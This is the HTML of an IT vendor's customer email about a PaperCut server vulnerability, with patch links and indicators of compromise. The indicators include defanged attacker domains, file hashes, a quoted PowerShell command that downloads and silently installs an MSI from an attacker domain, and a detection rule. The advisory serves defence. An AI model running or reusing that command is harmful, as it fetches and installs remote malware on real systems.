<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office"><head>
<!--[if gte mso 15]>
<xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
<o:PixelsPerInch>96</o:PixelsPerInch>
</o:OfficeDocumentSettings>
</xml>
<![endif]-->
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>PaperCut Vulnerability</title>
<style> img{-ms-interpolation-mode:bicubic;}
table, td{mso-table-lspace:0pt; mso-table-rspace:0pt;}
.mceStandardButton, .mceStandardButton td, .mceStandardButton td a{mso-hide:all !important;}
p, a, li, td, blockquote{mso-line-height-rule:exactly;}
p, a, li, td, body, table, blockquote{-ms-text-size-adjust:100%; -webkit-text-size-adjust:100%;}
@media only screen and (max-width: 480px){
body, table, td, p, a, li, blockquote{-webkit-text-size-adjust:none !important;}
}
.mcnPreviewText{display: none !important;}
.bodyCell{margin:0 auto; padding:0; width:100%;}
.ExternalClass, .ExternalClass p, .ExternalClass td, .ExternalClass div, .ExternalClass span, .ExternalClass font{line-height:100%;}
.ReadMsgBody{width:100%;} .ExternalClass{width:100%;}
a[x-apple-data-detectors]{color:inherit !important; text-decoration:none !important; font-size:inherit !important; font-family:inherit !important; font-weight:inherit !important; line-height:inherit !important;}
body{height:100%; margin:0; padding:0; width:100%; background: #ffffff;}
p{margin:0; padding:0;}
table{border-collapse:collapse;}
td, p, a{word-break:break-word;}
h1, h2, h3, h4, h5, h6{display:block; margin:0; padding:0;}
img, a img{border:0; height:auto; outline:none; text-decoration:none;}
a[href^="tel"], a[href^="sms"]{color:inherit; cursor:default; text-decoration:none;}
li p {margin: 0 !important;}
.ProseMirror a {
pointer-events: none;
}
@media only screen and (max-width: 480px){
body{width:100% !important; min-width:100% !important; }
body.mobile-native {
-webkit-user-select: none; user-select: none; transition: transform 0.2s ease-in; transform-origin: top center;
}
body.mobile-native.selection-allowed a, body.mobile-native.selection-allowed .ProseMirror {
user-select: auto;
-webkit-user-select: auto;
}
colgroup{display: none;}
img{height: auto !important;}
.mceWidthContainer{max-width: 660px !important;}
.mceColumn{display: block !important; width: 100% !important;}
.mceColumn-forceSpan{display: table-cell !important; width: auto !important;}
.mceBlockContainer{padding-right:16px !important; padding-left:16px !important;}
.mceSpacing-24{padding-right:16px !important; padding-left:16px !important;}
.mceFooterSection .mceText, .mceFooterSection .mceText p{font-size: 16px !important; line-height: 140% !important;}
.mceText, .mceText p{font-size: 16px !important; line-height: 140% !important;}
h1{font-size: 30px !important; line-height: 120% !important;}
h2{font-size: 26px !important; line-height: 120% !important;}
h3{font-size: 20px !important; line-height: 125% !important;}
h4{font-size: 18px !important; line-height: 125% !important;}
.ProseMirror {
-webkit-user-modify: read-write-plaintext-only;
user-modify: read-write-plaintext-only;
}
}
@media only screen and (max-width: 640px){
.mceClusterLayout td{padding: 4px !important;}
}
div[contenteditable="true"] {outline: 0;}
.ProseMirror .empty-node, .ProseMirror:empty {position: relative;}
.ProseMirror .empty-node::before, .ProseMirror:empty::before {
position: absolute;
left: 0;
right: 0;
color: rgba(0,0,0,0.2);
cursor: text;
}
.ProseMirror .empty-node:hover::before, .ProseMirror:empty:hover::before {
color: rgba(0,0,0,0.3);
}
.ProseMirror h1.empty-node::before {
content: 'Heading';
}
.ProseMirror p.empty-node:only-child::before, .ProseMirror:empty::before {
content: 'Start typing...';
}
a .ProseMirror p.empty-node::before, a .ProseMirror:empty::before {
content: '';
}
.mceText, .ProseMirror {
white-space: pre-wrap;
}
body, #bodyTable { background-color: rgb(244, 244, 244); }.mceText, .mceLabel { font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif; }.mceText, .mceLabel { color: rgb(0, 0, 0); }.mceText p { margin-bottom: 0px; }.mceText label { margin-bottom: 0px; }.mceText input { margin-bottom: 0px; }.mceSpacing-12 .mceInput + .mceErrorMessage { margin-top: -6px; }.mceText p { margin-bottom: 0px; }.mceText label { margin-bottom: 0px; }.mceText input { margin-bottom: 0px; }.mceSpacing-24 .mceInput + .mceErrorMessage { margin-top: -12px; }.mceInput { background-color: transparent; border: 2px solid rgb(208, 208, 208); width: 60%; color: rgb(77, 77, 77); display: block; }.mceInput[type="radio"], .mceInput[type="checkbox"] { float: left; margin-right: 12px; display: inline; width: auto !important; }.mceLabel > .mceInput { margin-bottom: 0px; margin-top: 2px; }.mceLabel { display: block; }.mceText p { color: rgb(0, 0, 0); font-family: "Helvetica Neue", Helvetica, Arial, Verdana, sans-serif; font-size: 16px; font-weight: normal; line-height: 1.5; text-align: left; letter-spacing: 0px; direction: ltr; }.mceText a { color: rgb(0, 0, 0); font-style: normal; font-weight: normal; text-decoration: underline; direction: ltr; }
@media only screen and (max-width: 480px) {
.mceText p { font-size: 16px !important; line-height: 1.5 !important; }
}
@media only screen and (max-width: 480px) {
.mceBlockContainer { padding-left: 16px !important; padding-right: 16px !important; }
}
#dataBlockId-9 p, #dataBlockId-9 h1, #dataBlockId-9 h2, #dataBlockId-9 h3, #dataBlockId-9 h4, #dataBlockId-9 ul { text-align: center; }#dataBlockId-1 p, #dataBlockId-1 h1, #dataBlockId-1 h2, #dataBlockId-1 h3, #dataBlockId-1 h4, #dataBlockId-1 ul { text-align: center; }</style></head>
<body>
<!--
-->
<!--[if !gte mso 9]><!----><span class="mcnPreviewText" style="display:none; font-size:0px; line-height:0px; max-height:0px; max-width:0px; opacity:0; overflow:hidden; visibility:hidden; mso-hide:all;">From TBS - Today's Business Solutions</span><!--<![endif]-->
<!--
-->
<center>
<table border="0" cellpadding="0" cellspacing="0" height="100%" width="100%" id="bodyTable" style="background-color: rgb(244, 244, 244);">
<tbody><tr>
<td class="bodyCell" align="center" valign="top">
<table id="root" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody data-block-id="13" class="mceWrapper"><tr><td align="center" valign="top" class="mceWrapperOuter"><!--[if (gte mso 9)|(IE)]><table align="center" border="0" cellspacing="0" cellpadding="0" width="660" style="width:660px;"><tr><td><![endif]--><table border="0" cellpadding="0" cellspacing="0" width="100%" style="max-width:660px" role="presentation"><tbody><tr><td style="background-color:#ffffff;background-position:center;background-repeat:no-repeat;background-size:cover" class="mceWrapperInner" valign="top"><table align="center" border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation" data-block-id="12"><tbody><tr class="mceRow"><td style="background-position:center;background-repeat:no-repeat;background-size:cover" valign="top"><table border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation"><tbody><tr><td style="padding-top:0;padding-bottom:0" class="mceColumn" data-block-id="-4" valign="top" colspan="12" width="100%"><table border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation"><tbody><tr><td style="padding-top:48px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><div data-block-id="1" class="mceText" id="dataBlockId-1" style="width:100%"><p class="last-child"><a href="https://mailchi.mp/d73ed47aa324/papercut-vulnerability?e=8bbedbdd28">View this email in your browser</a></p></div></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><div data-block-id="19" class="mceText" id="dataBlockId-19" style="width:100%"><p>Dear Valued TBS Customer,</p><p><br /></p><p>We have been made aware of a vulnerability within PaperCut. This vulnerability effects all PaperCut servers through port 9191. Servers which have port 9191 exposed to the outside world are <strong>EXTREMELY</strong> vulnerable.</p><p><br /></p><p class="last-child">We wanted to share with you the attached documents, one from PaperCut and the other, a useful article which provides insight to this issue, which we thought would be useful.</p></div></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" align="center" valign="top"><table align="center" border="0" cellpadding="0" cellspacing="0" role="presentation" data-block-id="5"><tbody><tr class="mceStandardButton"><td style="background-color:#16215e;border-radius:8px;text-align:center" class="mceButton" valign="top"><a href="https://tbsit360.us14.list-manage.com/track/click?u=bf77172ea6b10a18f6669778a&id=8ea6aed4f4&e=8bbedbdd28" target="_blank" style="background-color:#16215e;border-radius:8px;border:3px solid #16215e;color:#ffffff;display:block;font-family:'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;font-size:16px;font-weight:normal;font-style:normal;padding:16px 28px;text-decoration:none;min-width:30px;text-align:center;direction:ltr;letter-spacing:0px">Download Articles PDF </a></td></tr><tr>
<!--[if mso]>
<td align="center">
<v:roundrect xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:w="urn:schemas-microsoft-com:office:word"
href="https://mcusercontent.com/bf77172ea6b10a18f6669778a/files/3a9f97a6-fa72-482d-c96e-4fd808de1f97/Papercut_Article.01.pdf"
style="v-text-anchor:middle; width:228.86px; height:55.2px;"
arcsize="3%"
strokecolor="#16215e"
strokeweight="3px"
fillcolor="#16215e">
<v:stroke dashstyle="solid"/>
<w:anchorlock />
<center style="
color: #ffffff;
display: block;
font-family: 'Helvetica Neue', Helvetica, Arial, Verdana, sans-serif;
font-size: 16;
font-style: normal;
font-weight: normal;
letter-spacing: 0px;
text-decoration: none;
text-align: center;
direction: ltr;"
>
Download Articles PDF
</center>
</v:roundrect>
</td>
<![endif]-->
</tr></tbody></table></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><div data-block-id="20" class="mceText" id="dataBlockId-20" style="width:100%"><p>Please contact our support team to schedule the update. Anyone running PaperCut Version 19 or prior is required to contact our support team.</p><p><br /></p><p>To email: <a href="mailto:helpdesk@tbsit360.com?subject=PaperCut%20Vulnerabilty&body=null">Helpdesk@tbsit360.com</a> or call us (630) 537-1370 ext. 2</p><p><br /></p><p class="last-child">The links below from PaperCut are for anyone who would like to perform the update themselves.</p></div></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><div data-block-id="18" class="mceText" id="dataBlockId-18" style="width:100%"><p><br /></p><p><span style="font-size: 16px">Links to Download:</span></p><p><span style="font-size: 16px"> </span></p><p><span style="font-size: 16px">PaperCut Version 22</span></p><p><a href="https://tbsit360.us14.list-manage.com/track/click?u=bf77172ea6b10a18f6669778a&id=bbd917d6d3&e=8bbedbdd28"><span style="font-size: 16px">https://cdn.papercut.com/web/products/ng-mf/installers/mf/22.x/pcmf-setup-22.0.10.65997.exe</span></a></p><p><span style="font-size: 16px"> </span></p><p><span style="font-size: 16px">PaperCut Version 21:</span></p><p><a href="https://tbsit360.us14.list-manage.com/track/click?u=bf77172ea6b10a18f6669778a&id=ef667c7098&e=8bbedbdd28"><span style="font-size: 16px">https://cdn.papercut.com/web/products/ng-mf/installers/mf/21.x/pcmf-setup-21.2.11.65657.exe</span></a></p><p><span style="font-size: 16px"> </span></p><p><span style="font-size: 16px">PaperCut Version 20:</span></p><p><a href="https://tbsit360.us14.list-manage.com/track/click?u=bf77172ea6b10a18f6669778a&id=18b432a76b&e=8bbedbdd28"><span style="font-size: 16px">https://cdn.papercut.com/web/products/ng-mf/installers/mf/20.x/pcmf-setup-20.1.7.65660.exe</span></a><span style="font-size: 16px"> </span></p><p><span style="font-size: 16px"> </span></p><p><em><strong><span style="color:#fc0d0d;">Anyone running PaperCut Version 19 or prior is required to contact our support team.</span></strong></em></p><p><br /></p><p class="last-child"><em><strong><span style="color:#fc0d0d;"><span style="font-size: 16px">IMPORTANT: Make sure to backup your papercut Database before any installation above.</span></span></strong></em></p></div></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><div data-block-id="17" class="mceText" id="dataBlockId-17" style="width:100%"><p style="text-align: center;"><em><strong><span style="font-size: 19px">How do I know if my server has been exploited?</span></strong></em></p><p><br /></p><p>We currently recommend looking for the following Indicators of Compromise to determine if it is likely that the vulnerability has been used to install malware on the system. Depending on your systems, logging and endpoint protection software you may be able to detect the following.</p><p><br /></p><p>• If your security software has raised any alerts or warnings</p><p>• If you see suspicious PaperCut MF application log entries, ie:</p><p>• User “admin” logs into the administration interface</p><p>• Admin user “admin” modified the print script on the printer</p><p>• User “admin” updated the config key “…”</p><p>• User “[setup-wizard]” modified a config key</p><p>• Domains in DNS or web proxy logs:</p><p>• upd488[.]windowservicecemter[.]com/download/ld.txt</p><p>• upd488[.]windowservicecemter[.]com/download/AppPrint.msi</p><p>• upd488[.]windowservicecemter[.]com/download/a2.msi</p><p>• upd488[.]windowservicecemter[.]com/download/a3.msi</p><p>• anydeskupdate[.]com</p><p>• anydeskupdates[.]com</p><p>• netviewremote[.]com</p><p>• updateservicecenter[.]com</p><p>• windowcsupdates[.]com</p><p>• windowservicecentar[.]com</p><p>• windowservicecenter[.]com</p><p>• winserverupdates[.]com</p><p>• SHA256 hashes of files on local system:</p><p>• setup.msi f9947c5763542b3119788923977153ff8ca807a2e535e6ab28fc42641983aabb</p><p>• ld.txt c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125</p><p>• Powershell Scripts having similar content to:</p><p>```</p><p>cmd /c “powershell.exe -nop -w hidden</p><p>Invoke-WebRequest ‘hXXp://upd488[.]windowservicecemter[.]com/download/setup.msi’</p><p>-OutFile ‘setup.msi’ ”</p><p>cmd /c “msiexec /i setup.msi /qn IntegratorLogin=fimaribahundqf[AT]gmx[.]com CompanyId=1”\\@@</p><p>```</p><p>• Detection via YARA Rule on SIEM:</p><p>```</p><p>title: PaperCut MF/NG Vulnerability </p><p> authors: Huntress DE&TH Team </p><p> description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG </p><p> logsource: </p><p> category: process_creation </p><p> product: windows </p><p> detection: </p><p> selection: </p><p> ParentImage|endswith: \\pc-app.exe </p><p> Image|endswith: </p><p> - \\cmd.exe </p><p> - \\powershell.exe </p><p> condition: selection </p><p> level: high </p><p> falsepositives: </p><p> - Expected admin activity </p><p>```</p><p class="last-child">If you suspect that your server has been compromised, we recommend taking server backups, then wiping the Application Server, and rebuilding the Application Server and restoring the database from a ‘safe’ backup point prior to when you discovered any suspicious behavior.</p></div></td></tr><tr><td style="background-color:transparent;padding-top:20px;padding-bottom:20px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><table border="0" cellpadding="0" cellspacing="0" width="100%" style="background-color:transparent" role="presentation" data-block-id="16"><tbody><tr><td style="min-width:100%;border-top:2px solid #000000" valign="top"></td></tr></tbody></table></td></tr><tr><td style="background-color:transparent;padding-top:20px;padding-bottom:20px;padding-right:24px;padding-left:24px" class="mceBlockContainer" valign="top"><table border="0" cellpadding="0" cellspacing="0" width="100%" style="background-color:transparent" role="presentation" data-block-id="6"><tbody><tr><td style="min-width:100%;border-top:2px solid #000000" valign="top"></td></tr></tbody></table></td></tr><tr><td style="padding-top:8px;padding-bottom:8px;padding-right:8px;padding-left:8px" class="mceLayoutContainer" valign="top"><table align="center" border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation" data-block-id="11" id="section_0083ac4a9e7811ea40ce72d56ebb0410" class="mceFooterSection"><tbody><tr class="mceRow"><td style="background-position:center;background-repeat:no-repeat;background-size:cover" valign="top"><table border="0" cellpadding="0" cellspacing="12" width="100%" role="presentation"><tbody><tr><td style="padding-top:0;padding-bottom:0;margin-bottom:12px" class="mceColumn" data-block-id="-3" valign="top" colspan="12" width="100%"><table border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation"><tbody><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:48px;padding-left:48px" class="mceBlockContainer" align="center" valign="top"><img data-block-id="8" width="130" style="width:130px;height:auto;max-width:100%;display:block" alt="Logo" src="https://dim.mcusercontent.com/cs/bf77172ea6b10a18f6669778a/images/4d8c69b8-2f3f-e7b4-e767-d2d7551a418a.png?w=130&dpr=2" class="" /></td></tr><tr><td style="padding-top:12px;padding-bottom:12px;padding-right:24px;padding-left:24px" class="mceBlockContainer" align="center" valign="top"><div data-block-id="9" class="mceText" id="dataBlockId-9" style="display:inline-block;width:100%"><p class="last-child"><em><span style="font-size: 12px">Copyright (C) 2023 TBS - Today's Business Solutions. All rights reserved.</span></em><br /><span style="font-size: 12px">
We are in the same industry.
</span><br /><br /><span style="font-size: 12px">Our mailing address is:</span><br /><span style="font-size: 12px">
<div class="vcard"><span class="org fn">TBS - Today's Business Solutions</span><div class="adr"><div class="street-address">7820 S Quincy St</div><span class="locality">Willowbrook</span>, <span class="region">IL</span> <span class="postal-code">60527-5534</span></div><br><a href="https://tbsit360.us14.list-manage.com/vcard?u=bf77172ea6b10a18f6669778a&id=1c9cbcf45e" class="hcard-download">Add us to your address book</a></div>
</span><br /><br /><span style="font-size: 12px">Want to change how you receive these emails?</span><br /><span style="font-size: 12px">You can </span><a href="https://tbsit360.us14.list-manage.com/profile?u=bf77172ea6b10a18f6669778a&id=1c9cbcf45e&e=8bbedbdd28&c=a6bd7e6788"><span style="font-size: 12px">update your preferences</span></a><span style="font-size: 12px"> or </span><a href="https://tbsit360.us14.list-manage.com/unsubscribe?u=bf77172ea6b10a18f6669778a&id=1c9cbcf45e&e=8bbedbdd28&c=a6bd7e6788"><span style="font-size: 12px">unsubscribe</span></a></p></div></td></tr><tr><td class="mceLayoutContainer" align="center" valign="top"><table align="center" border="0" cellpadding="0" cellspacing="0" width="100%" role="presentation" data-block-id="-2"><tbody><tr class="mceRow"><td style="background-position:center;background-repeat:no-repeat;background-size:cover;padding-top:0px;padding-bottom:0px" valign="top"><table border="0" cellpadding="0" cellspacing="24" width="100%" role="presentation"><tbody></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><!--[if (gte mso 9)|(IE)]></td></tr></table><![endif]--></td></tr></tbody></table>
</td>
</tr>
</tbody></table>
</center>
<img src="https://tbsit360.us14.list-manage.com/track/open.php?u=bf77172ea6b10a18f6669778a&id=a6bd7e6788&e=8bbedbdd28" height="1" width="1" alt=""></body></html>